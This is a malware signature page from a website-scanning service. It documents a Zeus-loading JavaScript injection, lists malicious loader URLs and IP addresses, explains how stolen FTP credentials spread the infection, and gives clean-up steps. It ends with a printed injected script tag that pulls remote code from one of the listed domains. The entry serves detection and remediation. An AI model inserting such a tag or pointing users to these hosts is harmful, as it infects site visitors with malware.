SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs152

malware-entry-mwjs152

Description:Javascript malware used to load virus to visitors of an infected
web site (aka Zeus).
The javascript is not encoded and uses different domain names/files (some times at the port 8080):

http://assolkh.blackhulu.com:8080/Refresh.js

http://pocketbloke.ru/Keyboard.js

http://chickcase.ru/Keyboard.js

http://nuttypiano.com/Laser_Printer.js

http://illmoney.ru/Raw_Data.js"

http://dizzyfruit.ru/Hard_Copy.js

http://misspan.ru/YouTube.js

http://addonrock.ru/Netiquette.js

http://obscurewax.ru/Firewall.js

Most of these appear to be hosted at the same IP addresses and are not blacklisted by Google:

pocketbloke.ru has address 178.33.18.86
pocketbloke.ru has address 188.72.210.134
pocketbloke.ru has address 217.195.160.74
pocketbloke.ru has address 93.157.232.64
pocketbloke.ru has address 165.21.73.186

Affecting: The malware infects the web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the sites.
Note that every PHP, HTML and JS file gets compromised by this malware.

Clean up: The desktop must be cleanup first. Use multiple AVs if necessary, since this
virus is very good at hiding from the current AV that is running. Once it is clean, then you
can clean up the sites and change the passwords.You can also sign up with us
and let our team remove the malware for you.

Malware dump:


< script type="text/javascript" src= " http://chickcase.ru/Keyboard.js"